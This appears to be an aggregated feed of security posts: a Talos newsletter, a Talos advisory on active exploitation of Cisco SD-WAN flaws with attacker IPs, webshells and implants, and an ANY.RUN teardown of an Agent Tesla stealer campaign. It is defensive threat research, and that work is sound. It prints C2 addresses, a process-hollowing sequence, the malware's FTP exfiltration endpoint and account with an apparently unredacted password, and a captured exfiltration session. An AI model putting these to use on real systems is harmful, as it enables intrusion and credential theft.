Welcome to this week’s edition of the Threat Source newsletter.
Many solutions have been proposed to reduce software bugs: zero-defect mandates, pair programming, formal methods, and mathematical software proofs. The reality is that software engineering is hard. Identifying and fixing bugs before they make it into production code is hard. Source code peer review and extensive unit testing have improved code quality, but bugs still get through.
Not every bug is a vulnerability, and not every fault that appears to be a vulnerability can be usefully exploited. Nevertheless, through extensive testing and review, a skilled vulnerability researcher can still uncover faults in software that has already undergone rigorous quality assurance. However, skilled vulnerability researchers are a scarce resource and can only review so much software.
AI is the great hope for improving software quality. Iterative improvements in AI’s ability to find bugs mean that each new version of these systems is better than the last. We’re now at the point where AI, although still not as good as a skilled vulnerability researcher, can scan code to find errors at a scale and speed that human analysis cannot match. Used well, it can identify potential vulnerabilities before they reach production.
In the long term, this is very good news. Better automated review and analysis of software is how we will improve code quality. However, in the short term, decades of technical debt and latent errors will be uncovered and will need to be addressed. To make things more complex, threat actors will have access to these same tools to search for exploitable vulnerabilities for their own ends.
The result is likely to be a surge in patches. More vulnerabilities discovered means more fixes released, placing additional pressure on already stretched operations teams. Many of these patches will be urgent; some will address vulnerabilities that are being actively exploited. Without proper planning, the volume of fixes may outpace an organization’s capacity to deploy them.
The surge of patches has yet to happen, but the first signs may already be visible. Now is an excellent time to consider how you prioritise patching, apply patches at scale, and manage systems that cannot be patched quickly — or at all. We can reflect on these questions now, and improve our processes, or we can flounder when the surge of patches arrives. Either way, ready or not, the time of much patching is coming.
The one big thing
In Cisco Talos’ latest blog, we outline the differences between responding to state-sponsored threat actors and handling commodity ransomware. These advanced adversaries log in using valid credentials and leverage your own trusted tools to remain invisible for months. Because their primary objectives are long-term espionage and pre-positioning rather than immediate financial gain, standard incident response playbooks are entirely inadequate.
Why do I care?
State-sponsored actors operate inside your trust boundary and aim to remain completely undetected. They have the patience and resources to map your infrastructure, exploit supply chain vulnerabilities, and blend their lateral movement into routine administrative tasks. If your security architecture assumes internal traffic is inherently trustworthy, these adversaries will exploit that gap to establish deep, persistent access across both IT and operational technology environments. Prematurely containing these threats can even tip off the attacker, causing you to lose critical intelligence and the chance to fully eradicate their foothold.
So now what?
Shift to a zero trust architecture that continuously verifies access and plans for inevitable failures, starting with maximizing your visibility through centralized log aggregation and enabling Windows command-line and PowerShell script block logging. Prioritize identity management by enforcing multi-factor authentication on all administrative accounts and implementing a tiered access model. Update your incident response playbooks to specifically address living-off-the-land techniques, supply chain compromises, and the complex operational timing required for state-sponsored containment. Read the blog here for more information.
Top security headlines of the week
Linux bitten by second severe vulnerability in as many weeks The leaked exploit is deterministic, meaning it works precisely the same way each time it’s run and across different Linux distributions. It causes no crashes, making it stealthy to run. Install patches immediately. (Ars Technica)
A DOD contractor’s API flaw exposed military course data and service member records The issue affected Schemata, an AI-powered virtual training platform used in military and defense settings. According to Strix, an ordinary low-privilege account was able to access data across multiple tenants. (CyberScoop)
Fake OpenAI Privacy Filter repo hits No. 1 on Hugging Face, draws 244K downloads A malicious repository managed to take a spot in the platform’s trending list by impersonating OpenAI’s Privacy Filter open-weight model to deliver a Rust-based information stealer to Windows users. (The Hacker News)
TanStack, Mistral AI, UiPath hit in fresh supply chain attack The same as in previous campaigns, the worm targets sensitive information, including developer credentials, API keys, tokens, cloud credentials and secrets, cryptocurrency wallets, and more. (SecurityWeek)
Official CheckMarx Jenkins package compromised with infostealer Checkmarx warned over the weekend that a rogue version of its Jenkins Application Security Testing (AST) plugin had been published on the Jenkins Marketplace. (BleepingComputer)
Can’t get enough Talos?
Breaking things to keep them safe with Philippe Laulheret From his memorable experiment using a green onion to bypass a biometric fingerprint reader to his experience on the frontlines of cybersecurity, Philippe shares the journey that led him to vulnerability research.
Inside the SOC: AI-powered DNS defense against ransomware Learn how Cisco Talos’ advanced AI-driven detection, including domain generation algorithm (DGA) analysis, integrates within Cisco Secure access to proactively identify and predict malicious domains.
Clustering and reuse of phone numbers in scam emails Cisco Talos has recently started to collect and gather intelligence around phone numbers within emails as an additional indicator of compromise (IOC). In this blog, we discuss new insights into in-the-wild phone number reuse in scam emails.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-05-14 18:06:402026-05-14 18:06:40The time of much patching is coming
Cisco Talos is tracking the active exploitation of CVE-2026-20182, an authentication bypass vulnerability in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage.
Successful exploitation of CVE-2026-20182 allows an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system.
The exploitation of CVE-2026-20182 appears to have been limited so far and Talos clusters this activity under UAT-8616 with high confidence.
Talos is also aware of a series of threat actors, distinct from UAT-8616, that have been observed to be exploiting a different, previously disclosed set of vulnerabilities, in a new way than previously identified, beginning March 2026 – specifically CVE-2026-20133, CVE-2026-20128 and CVE-2026-20122. It is important to note that those vulnerabilities are distinct from and pre-date CVE-2026-20182. Cisco released software updates and a security advisory addressing those vulnerabilities in February 2026, strongly recommending customers to upgrade.
We have identified multiple clusters of post-compromise activity, beginning March 2026, associated with the exploitation of CVE-2026-20133, CVE-2026-20128 and CVE-2026-20122 that deployed webshells and other malicious tooling, described in this post.
We observed the vast majority of this exploitation involved the use of ZeroZenX labs’ proof-of-concept and accompanying JSP-based webshell which we track as “XenShell.”
UAT-8616 in-the-wild (ITW) exploitation of CVE-2026-20182
Talos is aware of the active, in-the-wild (ITW) exploitation of CVE-2026-20182 in Cisco Catalyst SD-WAN Controller and Manager, that allows log in to the affected system as an internal, high-privileged, non-root user account. Talos clusters the exploitation of this vulnerability and subsequent post-compromise activity under UAT-8616, whom we assess is a highly sophisticated cyber threat actor. UAT-8616 previously exploited a similar vulnerability in Cisco Catalyst SD-WAN Controller, CVE-2026-20127 to gain unauthorized access to SD-WAN systems.
UAT-8616 performed similar post-compromise actions after successfully exploiting CVE-2026-20182, as was observed in the exploitation of CVE-2026-20127 by the same threat actor. UAT-8616 attempted to add SSH keys, modify NETCONF configurations, and escalate to root privileges. Our findings indicate that the infrastructure used by UAT-8616 to carry out exploitation and post-compromise activities also overlaps with the Operational Relay Box (ORB) networks that Talos monitors closely.
Customers are strongly advised to follow the guidance and recommendations published in Cisco’s Security Advisory on CVE-2026-20182. Customer support is also available by initiating a TAC request. Please refer to the Recommendations and Detection Guidance section for additional coverage information. We also recommend referring to Rapid7’s disclosure on CVE-2026-20182 for additional details.
In-the-wild (ITW) exploitation of CVE-2026-20133, CVE-2026-20122, and CVE-2026-20128
Talos is also aware of the widespread in-the-wild active exploitation of three vulnerabilities in unpatched Cisco Catalyst SD-WAN Manager infrastructure (CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122) that, when chained together, can allow a remote unauthenticated attacker to gain access to the device. Cisco released software updates and a security advisory addressing these vulnerabilities in February 2026. Following the public release of proof-of-concept code exploiting these vulnerabilities by ZeroZenX Labs in March, we observed the exploitation of the unpatched systems from March to April 2026.
Talos has observed several other threat clusters, separate from UAT-8616, leveraging publicly available proof-of-concept exploit code to deploy webshells to affected systems. Following successful exploitation, the webshells would allow the attacker to execute bash commands on the affected system.
The vast majority of observed exploitation attempts involved the use of the ZeroZenX Labs proof-of-concept code and accompanying JavaServer Pages (JSP) shell, which we are calling “XenShell.” However, we observed several other JSP-based webshell variants, which are outlined below.
Note: The CVE referenced in the ZeroZenX Labs proof-of-concept is incorrectly attributed to CVE-2026-20127. Talos’ analysis indicates that the targeted CVEs in the proof-of-concept are in-fact CVE-2026-20133, CVE-2026-20128 and CVE-2026-20122.
So far, Talos has observed the following clusters of malicious activity being conducted post successful exploitation of CVE-2026-20133, CVE-2026-20122, and CVE-2026-20128: Cluster #1 to Cluster #10.
Cluster 1
This cluster has been actively exploiting CVE-2026-20133, CVE-2026-20128 and CVE-2026-20122 since at least March 6, 2026. Following the exploitation of these CVEs, the threat actor deployed a variant of the Godzilla web shell under the filename “20251117022131.jsp”. This variant is associated with a publicly available GitHub project.
The following IPs were used to carry out the exploit and subsequently interact with the shell:
38.181.52[.]89
89.125.244[.]33
89.125.244[.]51
Figure 1. Tas9er Godzilla shellcode deployed in Cluster #1.
Cluster 2
This cluster has been actively exploiting CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 since at least March 10, 2026. Following their exploitation, the threat actor deployed a variant of the Behinder webshell under the filename “conf.jsp”. This variant has been modified to only use Base64 for encoding, as opposed to AES encryption commonly observed in other variants.
The IP “71.80.85[.]135” was used to carry out the exploit and interact with the shell.
Figure 2. Behinder webshell deployed in Cluster #2.
Cluster 3
This cluster has been actively exploiting CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 since at least March 4, 2026. Following successful exploitation, the threat actor deployed XenShell under the name “sysv.jsp”, before returning hours later to deploy a variant of the Behinder webshell under the filename “sysinit.jsp”.
The IP “212.83.162[.]37” was used to carry out the exploit and interact with the shell.
Figure 3. Behinder webshell deployed in Cluster #3.
Cluster 4
This cluster has been actively exploiting CVE-2026-20133, CVE-2026-20128 and CVE-2026-20122 since at least March 3, 2026. Following successful exploitation, the threat actor deployed a variant of the Godzilla webshell under the filename “vmurnp_ikp.jsp”.
The following IPs are attributed to this cluster:
38.60.214[.]92
65.20.67[.]134
104.233.156[.]1
194.233.100[.]40
Figure 4. Godzilla webshell deployed in Cluster #4.
Cluster 5
Talos observed the deployment, beginning March 13, 2026, of a malware agent compiled off the publicly available AdaptixC2 red team framework. The filename was “systemd-resolved” and the agent’s command and control (C2) is “194[.]163[.]175[.]135:4445”.
The authors have changed the default TCP banner for the sample from “AdapticC2 server” to “shadowcore”. Hosted on Contabo GmbH, this is likely a VPS. As of March 28, 2026, this C2 IP, “194[.]163[.]175[.]135” hosted:
A Mythic C2 server on port 7443, along with a Mythic C2 server certificate with serial number: fece5b954e69b2c6a8d0a1029631a0d7
Another AdaptixC2 server on port 31337
An open SSH service on port 22, likely for administration of server
Cluster 6
In another cluster of activity, since at least March 5, 2026, Sliver, an open-source adversarial emulation framework (aka red-teaming implant), was deployed with the filename “CWan”. The Sliver sample’s C2 is “mtls://23.27.143[.]170:443”.
Cluster 7
In this cluster of activity, since at least March 25, 2026, an XMRig sample and its accompanying configuration file were downloaded and deployed via a shell script from the remote location “83.229.126[.]195”.
Activity observed in Cluster 8 began as early as March 10, 2026. This cluster consisted of a few key malicious tools. The first tool is KScan, an asset mapping tool, that can port scan, TCP fingerprint, capture banners for specified assets, and obtain as much port information as possible without sending more packets. It can perform automatic brute-force cracking and brute-force RDP. The tool’s filename and Go packages have been renamed to “QScan” by the authors, but it is essentially the same implementation as the open-source GitHub version.
The second tool, named “agent1”, is a Nim-based implant. It is most likely based on the open-source tools, Nimplant, but is further modified to include:
Additional commands/capabilities, such as cd to directories; cat files; download and upload files; execute files using bash; and collect system information such as username, hostname, hwid, process listings, etc.
C2 endpoints for communication, registration/check-ins, obtain tasks, provide results, and more:
/api/v1/handshake
/api/v1/results
/api/v1/payloads
/api/v1/exfiltrate
/api/v1/tasks
/api/v1/init
An RSA public key to be used by the agent to communicate with the C2 hosted on “hxxp://13[.]62[.]52[.]206:5004”.
This tool was downloaded and executed post-compromise from the remote location “replit[.]dev”:
Figure 6. Download and startup script for the Nim-based implant.
The attackers executed this command on the compromised system while connected from the source IP “79[.]135[.]105[.]208”. This is likely a ProtonVPN node.
Replit is an AI platform that facilitates building applications using AI. It is therefore likely that the backdoor was created with the help of AI to resemble Nimplant’s functionality with the additional capabilities and deviations listed above.
Cluster 9
In this cluster, since at least March 17, 2026, Talos observed the deployment of an XMRig miner and a peer-based proxying and tunneling tool.
This tool, gsocket, is a peer-based proxying and tunneling tool that allows peers to connect to each other within the Global Socket Relay Network (GSRN). GSRN allows peers to connect to each other using node IDs, which are unique 16-byte identifiers for nodes with the network.
This sample obtains the peer or C2 node to connect to by reading and Base58 decoding the accompanying “defunct[.]dat” file. The C2 peer ID is:
78 c4 a2 37 56 27 7b b7 de 20 06 76 34 d2 63 c9
The tool is activated by placing a malicious command in the .profile file:
This decodes to:
XMRig Miner
Accompanying gsocket was a Monero miner and its scripts and configuration files. The miner is also activated via the user profile (.profile):
The “miner.sh” will find all processes named XMRig, kill them, and then start its own copy of XMRig:
Cluster 10
This cluster of activity, since at least Mar 13, 2026, consisted of a credential stealer deployed along with accompanying scripts. The main script, named “loot_run.sh”, attempted to obtain:
The admin user’s hashdump
JSON Web Tokens (JWT) key chunks that are used for REST API authentication
AWS credentials for vManage: AccesKeyId, SecretAccessKey and Token
Two other helper scripts were also deployed in this cluster to check if the current user could escalate to root. The scripts contained a hardcoded password and used it to execute the command su root –c id. The output is checked for the string “uid=0(root)” to verify successful escalation.
Recommendations and detection guidance
Customers are strongly advised to follow the guidance and recommendations published in Cisco’s Security Advisory on CVE-2026-20182. Customer support is also available by initiating a TAC request. Talos strongly recommends that customers and partners using Cisco Catalyst SD-WAN technology follow the steps outlined in this advisory to help protect their environments. We also recommend referring to Rapid7’s disclosure on CVE-2026-20182 for additional details.
Credential theft malware rarely announces itself with ransomware-level noise. Instead, it operates like a silent siphon hidden inside everyday business workflows: invoices, payroll files, purchase orders, procurement requests. Agent Tesla campaigns are especially dangerous because they target the operational arteries of organizations, harvesting credentials that enable deeper compromise, business email compromise (BEC), financial fraud, cloud account takeover, and long-term espionage.
Key Takeaways
Agent Tesla remains highly effective in LATAM due to cheap licensing and easy configuration combined with region-specific social engineering.
Multi-stage loaders using .NET Reactor 6.x and Process Hollowing evade most static detection tools.
Financial and procurement departments are high-priority targets through purchase order and payroll-themed lures.
Compromised legitimate infrastructure (e.g., Romanian FTP servers) complicates blocking and attribution.
Fileless execution and cleartext FTP exfiltration make dynamic sandbox analysis essential.
The campaign has maintained the same C2 infrastructure for at least 18 months, indicating sustained, professional operations.
Organizations can significantly improve defenses through interactive sandboxing, targeted awareness training, and outbound FTP monitoring.
This investigation reveals an active Agent Tesla campaign specifically targeting Chilean and broader LATAM enterprises through procurement-themed phishing lures. The malware chain combines social engineering, obfuscated loaders, process hollowing, fileless execution, and FTP-based credential exfiltration to evade traditional defenses.
For organizations, the business impact extends far beyond a single infected endpoint: stolen browser, VPN, email, and FTP credentials can become the entry point for supply chain compromise, lateral movement, and unauthorized access to sensitive corporate systems.
Threat Overview: Agent Tesla in the LATAM Context
Latin America has become an increasingly attractive target for commodity malware operators. The combination of rapid digitalization, growing SME supply chains, and historically lower security maturity makes the region fertile ground for credential stealers. Among these, Agent Tesla consistently ranks as one of the most deployed families — cheap to license, easy to configure, and devastatingly effective against organizations with limited email security controls.
In March 2026, during routine threat hunting, we identified a malware sample delivered inside a RAR archive named Orden de compra_pdf.uu — Spanish for ‘purchase order’ — a social engineering lure specifically crafted for the Chilean and broader LATAM business environment. What followed was a multi-day investigation that uncovered not just a single sample, but a persistent infrastructure that has been quietly exfiltrating credentials from LATAM enterprises since at least mid-2024.
Agent Tesla is a .NET-based keylogger and credential stealer, commercially sold as a ‘Remote Administration Tool’ since 2014. Despite its age, it remains highly active because operators can purchase access cheaply and configure it through a GUI without programming knowledge. Its primary capabilities include:
Clipboard monitoring — intercepts copied passwords and crypto wallet addresses;
Exfiltration channels — SMTP, FTP, HTTP, or Telegram bot API.
In the LATAM context, Agent Tesla operators typically use spear-phishing lures themed around business documents: purchase orders, payment receipts, payroll files, and invoices. This campaign follows that pattern precisely, targeting the financial and procurement workflows of Chilean companies.
Business Impact: Why Agent Tesla Is a Serious Enterprise Threat
While Agent Tesla is often categorized as a “commodity stealer,” the operational impact on organizations can be severe. In many environments, credential theft creates the conditions for larger and more expensive incidents.
Financial Fraud and Business Email Compromise
The campaign specifically impersonates procurement and finance-related documents, indicating deliberate targeting of employees who routinely handle invoices, payment approvals, supplier communications, and payroll operations. Once email credentials are stolen, attackers can hijack ongoing financial conversations, redirect payments, or conduct BEC attacks that appear fully legitimate.
Supply Chain Exposure
Compromised FTP, VPN, and email accounts may provide indirect access to suppliers, logistics providers, distributors, and partner organizations. This creates a multiplier effect where a single infection can propagate trust-based compromise across the wider business ecosystem.
Cloud and SaaS Account Takeover
Modern browsers store credentials for cloud platforms, CRMs, collaboration tools, and internal portals. Theft of browser credential databases can therefore expose Microsoft 365, Google Workspace, Salesforce, SAP, and other critical business systems without the attacker needing to deploy ransomware or exploit vulnerabilities.
Long-Term Persistence and Espionage
Agent Tesla’s keylogging, clipboard interception, and screenshot functionality enable prolonged surveillance of employee activity. This allows operators to collect sensitive information gradually over time, including contracts, credentials, API keys, internal communications, and financial data.
Risk Summary: A single employee opening a convincing purchase order email can result in complete credential compromise across your organization’s digital tools. This campaign has operated undetected against LATAM businesses for over 18 months. The financial and operational cost of remediation significantly exceeds the cost of proactive prevention.
Close detection gaps with ANY.RUN.
Reduce security risk and breach impact.
This article walks through the full investigation methodology, from initial triage to infrastructure correlation, and demonstrates how ANY.RUN’s interactive sandbox and threat intelligence capabilities accelerated key phases of the analysis.
The file extension .uu is a deliberate obfuscation tactic. While the file is actually a RAR archive, the unusual extension is intended to confuse automated scanners and reduce detection rates on email gateways that rely on extension-based filtering.
.zip archive with fake extension
The Social Engineering Angle
The filename Orden de compra_pdf.uu translates to ‘Purchase order PDF’ in Spanish. This is a high-value lure for B2B environments: purchase orders are expected, frequently shared by email, and often opened without scrutiny by accounts payable and procurement personnel. The ‘_pdf’ substring creates a false sense of legitimacy, suggesting the recipient will open a PDF document.
This social engineering pattern is consistent across the 80+ samples we identified communicating with the campaign’s infrastructure – all impersonating financial or procurement documents in Spanish:
Orden de Compra.xlam — purchase order (macro-enabled spreadsheet);
OC 20240814.xlam / OC 20240813.xlam — dated order confirmations.
2. Kill Chain Analysis
Stage 1 — JScript Encoded Dropper
WinRAR extracts the archive to reveal Orden de compra_pdf.jse — a JScript Encoded Script (Microsoft Script Encoder format). This encoding is not true encryption, but is highly effective at bypassing signature-based AV detection and preventing casual inspection. The file is executed via Windows Script Host (wscript.exe).
Turn suspicious attachments into actionable intelligence.
Investigate phishing safely with ANY.RUN Sandbox.
The .jse dropper performs several actions in sequence:
Downloads a decoy PDF from a remote server and opens it to distract the victim while infection proceeds silently in the background.
Drops multiple PowerShell stager scripts to C:Temp with randomized names (AYRMWWFH.ps1, Z2KBLYG5.ps1, ELHYLTLT.ps1).
Invokes PowerShell with execution policy bypass — -ExecutionPolicy Bypass- to run the stagers without triggering security warnings.
Modifies registry keys for persistence.
All PowerShell stager scripts dropped during the campaign share the same SHA256 hash (96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7), confirming use of a standardized stager template across the campaign.
Stage 1 processes visible in the sandbox
Stage 2 — PowerShell Stager
The PowerShell stager loads ALTERNATE.dll — the Agent Tesla loader — and injects it into a legitimate Microsoft binary. The choice of injection target is deliberate: aspnet_compiler.exe is a trusted .NET Framework component, and its network activity is rarely flagged by endpoint security tools.
The stager implements a Process Hollowing injection sequence:
1. Locate aspnet_compiler.exe on disk
2. Spawn a suspended process instance
3. VirtualAllocEx() → allocate memory in target process
4. WriteProcessMemory() → write ALTERNATE.dll payload
5. GetProcAddress() → resolve entry point dynamically
6. Resume execution → Agent Tesla runs inside trusted process
Stage 3 — ALTERNATE.dll: The Protected Loader
The DLL is named ALTERNATE.dll internally (with a matching ALTERNATE.pdb debug path left in the binary). Static analysis with Detect-It-Easy reveals a sophisticated protection stack:
Value
Property
Details
PE32 .NET Assembly (x86)
Format
CLR v4.0.30319 / .NET 4.5.1
.NET Reactor 6.x
Protection
Commercial .NET protection framework
Control Flow Obfuscation
Protection
Scrambles IL execution graph with fake branches
Calls Encryption
Protection
Replaces method calls with encrypted delegates
Virtualization
Protection
Converts methods to custom VM bytecode
Anti-ILDASM
Protection
Breaks dnSpy/ILSpy decompilation
Math Mutations
Protection
Replaces constants with equivalent expressions
Fake .cctor names
Protection
Poisons metadata to confuse decompilers
2066 (forged)
PE Timestamp
Anti-forensic timestamp manipulation
The use of .NET Reactor 6.x explains why standard tools like de4dot fail without additional flags. The correct tool for this protection version is NETReactorSlayer:
# Recommended approach:
NETReactorSlayer.CLI.exe --no-pause ALTERNATE.dll
# Alternative with de4dot (force detector):
de4dot.exe ALTERNATE.dll --det reactor
Partial deobfuscation via NETReactorSlayer reduced the binary from 79,872 → 42,496 bytes (a 46.8% reduction), confirming that nearly half the original file consisted purely of protection scaffolding. Post-deobfuscation entropy dropped from 6.0 → 5.86, and previously hidden IL structures became accessible for analysis.
Internal Architecture (Post-Deobfuscation)
Analysis of the partially deobfuscated binary (alternate_Slayed.dll) reveals the loader’s true internal architecture. Method names remain obfuscated (smethod_10, Delegate10, Struct10) — a pattern consistent with automated obfuscation frameworks — but the functional structure is now recoverable.
The loader implements a Read → Decrypt → Decompress → Execute pipeline:
The loader uses RijndaelManaged (the .NET implementation of AES) with CryptoStream and explicit set_IV calls, confirming AES-CBC mode with a hardcoded key and a prepended IV. Four 256-bit (32-byte) key candidates were identified in the deobfuscated binary:
The encrypted payload blob is located at offset 0x4600 in the deobfuscated binary (relocated from 0x12000 in the original), measures 2,560 bytes, and retains maximum entropy of 7.93 / 8.0, confirming the AES encryption survived deobfuscation intact.
Dynamic Execution via Reflection
The loader avoids static linking of the final payload by using .NET Reflection to load and invoke Agent Tesla entirely from a byte array in memory. The relevant APIs observed post-deobfuscation:
API
Category
Role
DynamicMethod / CreateDelegate
Reflection API
Runtime method generation and invocation
ResolveMethod / GetMethod
Reflection API
Dynamic method resolution without static references
CreateInstance
Reflection API
Object instantiation from decrypted assembly
Assembly.Load (byte[])
Reflection API
Loads Agent Tesla PE from memory – no disk write
Process Hollowing — Full Win32 API Map
The deobfuscated binary exposes the complete Process Hollowing implementation as UTF-16 P/Invoke strings. The API sequence is a textbook 32-bit hollowing with Wow64 support for 32→64-bit environments:
API + Offset
Library
Function
CreateProcessA @ 0x8EC4
Win32 / kernel32
Spawns aspnet_compiler.exe in suspended state
ZwUnmapViewOfSection @ 0x8E9A
ntdll
Unmaps original executable from target memory
VirtualAllocEx @ 0x8E26
Win32 / kernel32
Allocates RWX memory in target process
WriteProcessMemory @ 0x8E44
Win32 / kernel32
Writes Agent Tesla PE headers and sections
ReadProcessMemory @ 0x8E6A
Win32 / kernel32
Verifies write integrity
GetThreadContext @ 0x8DE2
Win32 / kernel32
Reads EIP/EBX from suspended thread
SetThreadContext @ 0x8D94
Win32 / kernel32
Redirects EIP to Agent Tesla entry point
Wow64GetThreadContext @ 0x8DD8
Win32 / kernel32
32→64-bit context read
Wow64SetThreadContext @ 0x8D8A
Win32 / kernel32
32→64-bit context write
ResumeThread @ 0x8D70
Win32 / kernel32
Resumes thread – Agent Tesla begins executing
The hollower contains hardcoded error strings —“Failed to allocate memory”, “Failed to unmap section”, “Failed to update PEB”— suggesting it was built from a reusable hollowing template with debug output preserved, a common trait in commodity malware kits.
Execution Control Flags
Three internal execution control strings were recovered post-deobfuscation: ALTERNATE, EXECUTE, and LAUNCH. These likely govern different execution paths within the loader — for example, switching between in-process shellcode execution and remote process hollowing depending on runtime conditions such as privilege level or AV detection.
Stage 4 — Agent Tesla Deployed In-Memory
The Agent Tesla payload is stored as a 2,560-byte AES-encrypted and deflate-compressed blob embedded in the loader’s .text section. The double-layering — compressed and then encrypted — ensures the payload has no recognizable structure at rest and defeats both signature and entropy-based detection.
Value
Field
Notes
0x4600 – 0x5000 (deobfuscated)
Location
Relocated from 0x12000 in original binary
2,560 bytes
Size
Encrypted + compressed payload
7.93 / 8.0
Entropy
Maximum – AES encryption confirmed
256 / 256
Unique bytes
Fully uniform distribution
RijndaelManaged (AES-256 CBC)
Cipher
Confirmed via CryptoStream + set_IV calls
f87d105625dbc96f63d5b4b81dce4c39
IV candidate
First 16 bytes of blob
DeflateStream
Compression
Applied before encryption
At runtime, the loader decrypts the blob using the hardcoded key and embedded IV, decompresses the result with DeflateStream, then uses Assembly.Load() to instantiate Agent Tesla directly from the resulting byte array in memory. No file is written to disk at any stage from this point forward — the execution is entirely fileless.
3. Payload Analysis: Agent Tesla Unpacked
Memory dumps captured during sandbox execution allowed recovery of the fully decrypted Agent Tesla payload — the binary that runs inside the hollowed aspnet_compiler.exe process. Static analysis of this dump (270,336 bytes, SHA256: 43d09743a69c9afa7156bf4e2bf7423b3d5f5ad7d54c4c3fb8a698d526778057) reveals the complete capability set and hardcoded configuration of this Agent Tesla instance.
With the payload decrypted, the complete operator configuration is visible in plaintext — the same values that were hidden behind AES-256 in the loader stage:
Value
Field
Notes
ftp://ftp.horeca-bucuresti.ro
FTP URL
C2 exfiltration endpoint – hardcoded
americas2@horeca-bucuresti.ro
FTP Username
Operator drop account – hardcoded
H*TE9iL;x61m
FTP Password
[REDACTED in publication] – plaintext in payload
http://ip-api.com/line/?fields=hosting
Fingerprint URL
Pre-exfil hosting check – hardcoded
roSkM / roSkM.exe
Mutex / EXE name
Campaign instance identifier
hdfzpysvpzimorhk
Secondary mutex
Anti-re-infection mutex
HnJnO
Campaign tag
Instance/build identifier
7bcd610d-7af6-4dc2-875b-dc4fec91463c.exe
Persistence name
GUID filename used for autorun copy
The FTP password recovered from the memory dump matches exactly the credentials captured in cleartext by ANY.RUN during the dynamic analysis phase, providing cross-validation between static payload analysis and live network capture.
Exfiltrated password in the sandbox analysisExfiltrated data in payload analysis
Credential Theft Capabilities
The unpacked payload targets over 80 applications across six categories, representing one of the broadest credential theft surface areas among commodity stealers:
Outlook (2003–19), Thunderbird, Foxmail, Mailbird, The Bat!, Postbox, IncrediMail, Eudora, Becky!, ClawsMail, PocoMail, SeaMonkey Mail, Opera Mail, Falkon, Flock, K-Meleon, IceCat, PaleMoon, eM Client, Windows Mail App, Trillian
The payload implements a full system-wide keylogger via Windows hook APIs. 26 special keys are mapped to labeled tokens for inclusion in keylog reports:
Clipboard Monitoring Agent Tesla registers a SetClipboardViewer / ChangeClipboardChain hook to intercept clipboard content in real time. Captured data is tagged with <br><hr>Copied Text: <br>and appended to the exfiltration report. This is particularly effective for capturing copied passwords, API keys, and cryptocurrency wallet addresses.
Screenshot Capture A configurable screenshot module captures periodic desktop images. The interval is controlled by the KeyloggerInterval setting. Screenshots are base64-encoded and included in the HTML exfiltration report alongside stolen credentials.
Persistence Mechanisms
The payload supports multiple persistence methods, selectable at build time:
Registry Run key — HKCUSoftwareMicrosoftWindowsCurrentVersionRun[StartupRegName];
Startup folder — copies itself to %APPDATA%MicrosoftWindowsStart MenuProgramsStartup ;
Task Scheduler — creates a scheduled task for persistence without registry artifacts;
GUID-named copy — drops as 7bcd610d-7af6-4dc2-875b-dc4fec91463c.exe to blend with system files.
Other evasion methods
Anti-Analysis / Anti-VM
The payload performs environment checks before proceeding, scanning for indicators of analysis environments:
Indicator
Method
Target
VMware / vmware
Process/file check
VMware guest detection
VirtualBox
Registry/file check
VirtualBox guest detection
SbieDll.dll
DLL presence check
Sandboxie sandbox detection
cmdvrt32.dll
DLL presence check
Comodo sandbox detection
SxIn.dll / Sf2.dll / snxhk.dll
DLL presence check
Avast/Sophos sandbox detection
Malware detects sandbox environments
Exfiltration Report Format
The HTML report generated by Agent Tesla and uploaded to the FTP drop server follows a fixed template, reconstructed from the payload strings. The format observed in the ANY.RUN network capture matches exactly:
Time: [MM/dd/yyyy HH:mm:ss]
User Name: [Windows username]
Computer Name: [hostname]
OSFullName: [Windows edition]
CPU: [processor model from WMI Win32_Processor]
RAM: [available RAM in MB]
<hr>
Host: [URL where credentials were stolen from]
Username: [stolen username]
Password: [stolen password]
Application: [browser/client name]
<hr>
[...additional credential blocks...]
<hr>Copied Text: [clipboard contents]
This template is hardcoded in the payload and has remained consistent across multiple Agent Tesla v3 builds observed in LATAM campaigns. The ‘Time:’ field uses MM/dd/yyyy format, which combined with the Spanish-language lures, suggests the operator targets both English and Spanish-speaking environments.
Exfiltration report in the sandbox
4. Dynamic Analysis: Behavioral Confirmation
Detonating the full infection chain in ANY.RUN’s Interactive Sandbox provided behavioral confirmation of the attack and captured artifacts that static analysis alone could not reveal.
Process tree
Agent Tesla process chain
The full process execution chain observed in the sandbox:
aspnet_compiler.exe (PID 7720) → hollowed process – executes Agent Tesla payload.
Pre-Exfiltration: Victim Fingerprinting
Before exfiltrating stolen data, Agent Tesla performs a geolocation and hosting provider check via ip-api[.]com. This common stealer pattern verifies the victim is not running inside a sandbox or corporate proxy before proceeding with exfiltration:
GET http://ip-api.com/line/?fields=hosting HTTP/1.1
Host: ip-api.com
→ Response: false (victim is not a hosting provider)
→ Agent Tesla proceeds with exfiltration
ANY.RUN flagged this request with the Suricata rule: “ET MALWARE Common Stealer Behavior — Source IP Associated with Hosting Provider Check via ip-api.com”, confirming the pre-exfiltration fingerprinting behavior.
Suricata rule triggered by possible fingerprinting
Credential Theft
The sandbox confirmed active credential theft from web browsers. The behavioral indicators observed:
Accesses Chrome and Firefox browser profile directories and credential store databases;
Reads saved password and autofill data;
Formats captured credentials as HTML report for exfiltration;
Collects system fingerprint: hostname, username, OS version, CPU model, RAM.
FTP Exfiltration
The most critical finding from dynamic analysis was the capture of cleartext FTP credentials and exfiltration traffic. FTP operates without transport encryption by default, making the full authentication handshake and data transfer visible in the network capture:
220 Welcome to Pure-FTPd [privsep] [TLS]
331 User americas2@horeca-bucuresti.ro OK. Password required
USER americas2@horeca-bucuresti.ro
PASS [REDACTED]
230 OK. Current restricted directory is /
STOR PW_admin-DESKTOP-JGLLJLD_2026_03_27_17_19_15.html
226 File successfully transferred (3.79 KB/s)
The exfiltrated file follows a consistent naming convention: PW_[username]-[hostname]_[timestamp].html. This structured naming allows the operator to efficiently process stolen credentials from multiple victims in the drop directory.
Agent Tesla exfiltrating data
The following Suricata rules fired during the exfiltration phase:
SUSPICIOUS [ANY.RUN] Possible admin username observed in outbound connection
